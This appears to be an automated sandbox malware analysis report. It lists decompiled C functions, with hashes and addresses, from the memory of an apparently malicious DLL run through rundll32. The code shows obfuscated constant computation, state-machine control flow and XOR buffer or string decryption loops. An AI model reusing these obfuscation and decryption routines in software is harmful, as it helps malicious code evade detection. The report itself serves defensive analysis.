                                                                                                                      0x006854b9
                                                                                                                      0x006854d2
                                                                                                                      0x006854d4
                                                                                                                      0x006854d9
                                                                                                                      0x006854db
                                                                                                                      0x00000000
                                                                                                                      0x006854db
                                                                                                                      0x006854d9
                                                                                                                      0x006854b7
                                                                                                                      0x006854b3
                                                                                                                      0x006854ab
                                                                                                                      0x00685547
                                                                                                                      0x00685547
                                                                                                                      0x00685527
                                                                                                                      0x0068552d
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H2
                                                                                                                      • API String ID: 0-302591398
                                                                                                                      • Opcode ID: 27d0d1d2dee5e0e592cf025c747fff3e88f18dd55c66b7bc59b9b77318dceff9
                                                                                                                      • Instruction ID: 1856aed6b4487487bfb289db403b9a24ca128d6f140eadb0a1e74ceeeb3e8137
                                                                                                                      • Opcode Fuzzy Hash: 27d0d1d2dee5e0e592cf025c747fff3e88f18dd55c66b7bc59b9b77318dceff9
                                                                                                                      • Instruction Fuzzy Hash: F941CF326083019FC724EF25E54942FBBE2FBD8718F144A1DF58666221D7B1CA88CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00688B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00688B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E0069D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E0069D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E00683DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                      0x00688b44
                                                                                                                      0x00688b48
                                                                                                                      0x00688b4a
                                                                                                                      0x00688b4e
                                                                                                                      0x00688b52
                                                                                                                      0x00688b56
                                                                                                                      0x00688b57
                                                                                                                      0x00688b58
                                                                                                                      0x00688b5d
                                                                                                                      0x00688b65
                                                                                                                      0x00688b68
                                                                                                                      0x00688b6f
                                                                                                                      0x00688b77
                                                                                                                      0x00688b79
                                                                                                                      0x00688b81
                                                                                                                      0x00688b86
                                                                                                                      0x00688b93
                                                                                                                      0x00688b9b
                                                                                                                      0x00688ba3
                                                                                                                      0x00688bab
                                                                                                                      0x00688bb3
                                                                                                                      0x00688bbb
                                                                                                                      0x00688bc3
                                                                                                                      0x00688bc8
                                                                                                                      0x00688bd0
                                                                                                                      0x00688bd8
                                                                                                                      0x00688be0
                                                                                                                      0x00688be8
                                                                                                                      0x00688bf0
                                                                                                                      0x00688bf8
                                                                                                                      0x00688bfd
                                                                                                                      0x00688c05
                                                                                                                      0x00688c0d
                                                                                                                      0x00688c15
                                                                                                                      0x00688c1d
                                                                                                                      0x00688c25
                                                                                                                      0x00688c2d
                                                                                                                      0x00688c35
                                                                                                                      0x00688c3a
                                                                                                                      0x00688c42
                                                                                                                      0x00688c4a
                                                                                                                      0x00688c52
                                                                                                                      0x00688c5d
                                                                                                                      0x00688c65
                                                                                                                      0x00688c69
                                                                                                                      0x00688c6e
                                                                                                                      0x00688c76
                                                                                                                      0x00688c76
                                                                                                                      0x00688c80
                                                                                                                      0x00688ce0
                                                                                                                      0x00000000
                                                                                                                      0x00688c82
                                                                                                                      0x00688c88
                                                                                                                      0x00688cd0
                                                                                                                      0x00688cd5
                                                                                                                      0x00688cd8
                                                                                                                      0x00688cda
                                                                                                                      0x00688cdc
                                                                                                                      0x00000000
                                                                                                                      0x00688cdc
                                                                                                                      0x00688c8a
                                                                                                                      0x00688c8a
                                                                                                                      0x00688c8c
                                                                                                                      0x00000000
                                                                                                                      0x00688c8e
                                                                                                                      0x00688ca2
                                                                                                                      0x00688caf
                                                                                                                      0x00688caf
                                                                                                                      0x00688c8c
                                                                                                                      0x00688c88
                                                                                                                      0x00688cb3
                                                                                                                      0x00688cbb
                                                                                                                      0x00688cbb
                                                                                                                      0x00688cf8
                                                                                                                      0x00688cfd
                                                                                                                      0x00688d00
                                                                                                                      0x00688d05
                                                                                                                      0x00688d05
                                                                                                                      0x00688d05
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7RX
                                                                                                                      • API String ID: 0-861457431
                                                                                                                      • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                      • Instruction ID: 25810cc74914384e4183b28c016edcf5e0c889aca3a4759649d8d3b612fc85c1
                                                                                                                      • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                      • Instruction Fuzzy Hash: 4B4157711097019FCB949F21C48986FBBE2FFC4B88F500A2DF59652220D7718A598F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00697BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00697BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E00687FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                      0x00697bac
                                                                                                                      0x00697bb0
                                                                                                                      0x00697bb3
                                                                                                                      0x00697bb4
                                                                                                                      0x00697bb8
                                                                                                                      0x00697bb9
                                                                                                                      0x00697bba
                                                                                                                      0x00697bbf
                                                                                                                      0x00697bc7
                                                                                                                      0x00697bc9
                                                                                                                      0x00697bd3
                                                                                                                      0x00697bd7
                                                                                                                      0x00697bdf
                                                                                                                      0x00697be4
                                                                                                                      0x00697bec
                                                                                                                      0x00697bf4
                                                                                                                      0x00697c03
                                                                                                                      0x00697c06
                                                                                                                      0x00697c0a
                                                                                                                      0x00697c12
                                                                                                                      0x00697c1a
                                                                                                                      0x00697c22
                                                                                                                      0x00697c32
                                                                                                                      0x00697c36
                                                                                                                      0x00697c3f
                                                                                                                      0x00697c42
                                                                                                                      0x00697c46
                                                                                                                      0x00697c4e
                                                                                                                      0x00697c53
                                                                                                                      0x00697c56
                                                                                                                      0x00697c58
                                                                                                                      0x00697c5e
                                                                                                                      0x00697c6f
                                                                                                                      0x00697c83
                                                                                                                      0x00697c88
                                                                                                                      0x00697c90
                                                                                                                      0x00697ca6
                                                                                                                      0x00697cab
                                                                                                                      0x00697cad
                                                                                                                      0x00697cb3
                                                                                                                      0x00697cb5
                                                                                                                      0x00697cb9
                                                                                                                      0x00697cba
                                                                                                                      0x00697cbd
                                                                                                                      0x00697cc0
                                                                                                                      0x00697cc4
                                                                                                                      0x00697cc4
                                                                                                                      0x00697cca
                                                                                                                      0x00697cd0
                                                                                                                      0x00000000
                                                                                                                      0x00697cd0
                                                                                                                      0x00697cca
                                                                                                                      0x00697cda

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ]0
                                                                                                                      • API String ID: 0-3096761382
                                                                                                                      • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                      • Instruction ID: 3b864c8ca0c217cde57712be4e2c5fa535e0853dd2da6f4ca0b2b967328975cd
                                                                                                                      • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                      • Instruction Fuzzy Hash: FB3177716093008FD758CF29C88594BFBE6EBC9708F108A2EF58993251DBB5E9058B56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00683C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00683C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E0068A918(_a4, _v40, _v36, _v8, E0069DCF7(_v32, 0x6817c0, _v40), _v12,  &_v564);
				E0068A8B0(_v24, _t107, _v16);
				return E00691F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                      0x00683c46
                                                                                                                      0x00683c49
                                                                                                                      0x00683c4c
                                                                                                                      0x00683c4f
                                                                                                                      0x00683c50
                                                                                                                      0x00683c51
                                                                                                                      0x00683c56
                                                                                                                      0x00683c5f
                                                                                                                      0x00683c66
                                                                                                                      0x00683c6d
                                                                                                                      0x00683c79
                                                                                                                      0x00683c7e
                                                                                                                      0x00683c87
                                                                                                                      0x00683c8a
                                                                                                                      0x00683c8d
                                                                                                                      0x00683c94
                                                                                                                      0x00683c9b
                                                                                                                      0x00683ca2
                                                                                                                      0x00683ca9
                                                                                                                      0x00683cb5
                                                                                                                      0x00683cb6
                                                                                                                      0x00683cbb
                                                                                                                      0x00683cc2
                                                                                                                      0x00683cc9
                                                                                                                      0x00683ccd
                                                                                                                      0x00683cd8
                                                                                                                      0x00683cdb
                                                                                                                      0x00683ce2
                                                                                                                      0x00683ce9
                                                                                                                      0x00683ced
                                                                                                                      0x00683cf4
                                                                                                                      0x00683cf8
                                                                                                                      0x00683cff
                                                                                                                      0x00683d06
                                                                                                                      0x00683d0d
                                                                                                                      0x00683d14
                                                                                                                      0x00683d1b
                                                                                                                      0x00683d2c
                                                                                                                      0x00683d2f
                                                                                                                      0x00683d33
                                                                                                                      0x00683d37
                                                                                                                      0x00683d3e
                                                                                                                      0x00683d45
                                                                                                                      0x00683d4c
                                                                                                                      0x00683d53
                                                                                                                      0x00683d5a
                                                                                                                      0x00683d61
                                                                                                                      0x00683d65
                                                                                                                      0x00683d6c
                                                                                                                      0x00683d6f
                                                                                                                      0x00683d90
                                                                                                                      0x00683d9d
                                                                                                                      0x00683dbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a3}
                                                                                                                      • API String ID: 0-1821053108
                                                                                                                      • Opcode ID: 02f1bd4b80f3132d5abe380d01b1898ef5c1c124be8561517a3b8c2e8bc79277
                                                                                                                      • Instruction ID: e61b9f02ee9bccee1c3a90da77a2006003d3c8f82dd56e3128c20e75083ab1ae
                                                                                                                      • Opcode Fuzzy Hash: 02f1bd4b80f3132d5abe380d01b1898ef5c1c124be8561517a3b8c2e8bc79277
                                                                                                                      • Instruction Fuzzy Hash: C9410271D0020AEBCF48DFE0D94A4EEBBB6FB44304F20819AE510B6260C7B95B55DFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00698606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00698606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E006920B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E00687FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                      0x0069860c
                                                                                                                      0x00698610
                                                                                                                      0x00698614
                                                                                                                      0x00698618
                                                                                                                      0x0069861a
                                                                                                                      0x0069861f
                                                                                                                      0x00698627
                                                                                                                      0x0069862a
                                                                                                                      0x00698632
                                                                                                                      0x00698637
                                                                                                                      0x0069863f
                                                                                                                      0x00698647
                                                                                                                      0x0069864f
                                                                                                                      0x00698659
                                                                                                                      0x0069865d
                                                                                                                      0x00698665
                                                                                                                      0x0069866d
                                                                                                                      0x00698675
                                                                                                                      0x0069867a
                                                                                                                      0x00698682
                                                                                                                      0x00698686
                                                                                                                      0x00698689
                                                                                                                      0x0069868b
                                                                                                                      0x0069868f
                                                                                                                      0x00698693
                                                                                                                      0x006986a3
                                                                                                                      0x006986ae
                                                                                                                      0x006986bc
                                                                                                                      0x006986be
                                                                                                                      0x006986c6
                                                                                                                      0x006986ce
                                                                                                                      0x006986d0
                                                                                                                      0x006986e1
                                                                                                                      0x006986e6
                                                                                                                      0x006986e8
                                                                                                                      0x006986ec
                                                                                                                      0x006986ec
                                                                                                                      0x006986ee
                                                                                                                      0x006986f1
                                                                                                                      0x006986f3
                                                                                                                      0x006986fa
                                                                                                                      0x006986fd
                                                                                                                      0x00698700
                                                                                                                      0x00698703
                                                                                                                      0x00698709
                                                                                                                      0x0069870a
                                                                                                                      0x0069870d
                                                                                                                      0x00698711
                                                                                                                      0x00698711
                                                                                                                      0x0069871a
                                                                                                                      0x0069871a
                                                                                                                      0x00698726

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &#
                                                                                                                      • API String ID: 0-2240308938
                                                                                                                      • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                      • Instruction ID: dc65802980464edf29ea6d1bada734de058abcef200ee17f15acf5b85915b755
                                                                                                                      • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                      • Instruction Fuzzy Hash: 40318D726083418FC704DF28C88585BFBE0FF98718F054B6DE889A7201C774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069DCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0069DCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E006920B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E00687FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                      0x0069dcfd
                                                                                                                      0x0069dd01
                                                                                                                      0x0069dd05
                                                                                                                      0x0069dd07
                                                                                                                      0x0069dd0c
                                                                                                                      0x0069dd14
                                                                                                                      0x0069dd1c
                                                                                                                      0x0069dd20
                                                                                                                      0x0069dd28
                                                                                                                      0x0069dd30
                                                                                                                      0x0069dd38
                                                                                                                      0x0069dd40
                                                                                                                      0x0069dd48
                                                                                                                      0x0069dd50
                                                                                                                      0x0069dd58
                                                                                                                      0x0069dd5c
                                                                                                                      0x0069dd5f
                                                                                                                      0x0069dd61
                                                                                                                      0x0069dd65
                                                                                                                      0x0069dd69
                                                                                                                      0x0069dd79
                                                                                                                      0x0069dd84
                                                                                                                      0x0069dd93
                                                                                                                      0x0069dd95
                                                                                                                      0x0069dd9d
                                                                                                                      0x0069dda5
                                                                                                                      0x0069dda7
                                                                                                                      0x0069ddb8
                                                                                                                      0x0069ddbd
                                                                                                                      0x0069ddbf
                                                                                                                      0x0069ddc3
                                                                                                                      0x0069ddc3
                                                                                                                      0x0069ddc5
                                                                                                                      0x0069ddc8
                                                                                                                      0x0069ddcd
                                                                                                                      0x0069ddd5
                                                                                                                      0x0069dddb
                                                                                                                      0x0069dddf
                                                                                                                      0x0069dde8
                                                                                                                      0x0069dde9
                                                                                                                      0x0069ddf0
                                                                                                                      0x0069ddf4
                                                                                                                      0x0069ddf8
                                                                                                                      0x0069ddf8
                                                                                                                      0x0069de03
                                                                                                                      0x0069de03
                                                                                                                      0x0069de0f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: g|E
                                                                                                                      • API String ID: 0-3824901942
                                                                                                                      • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
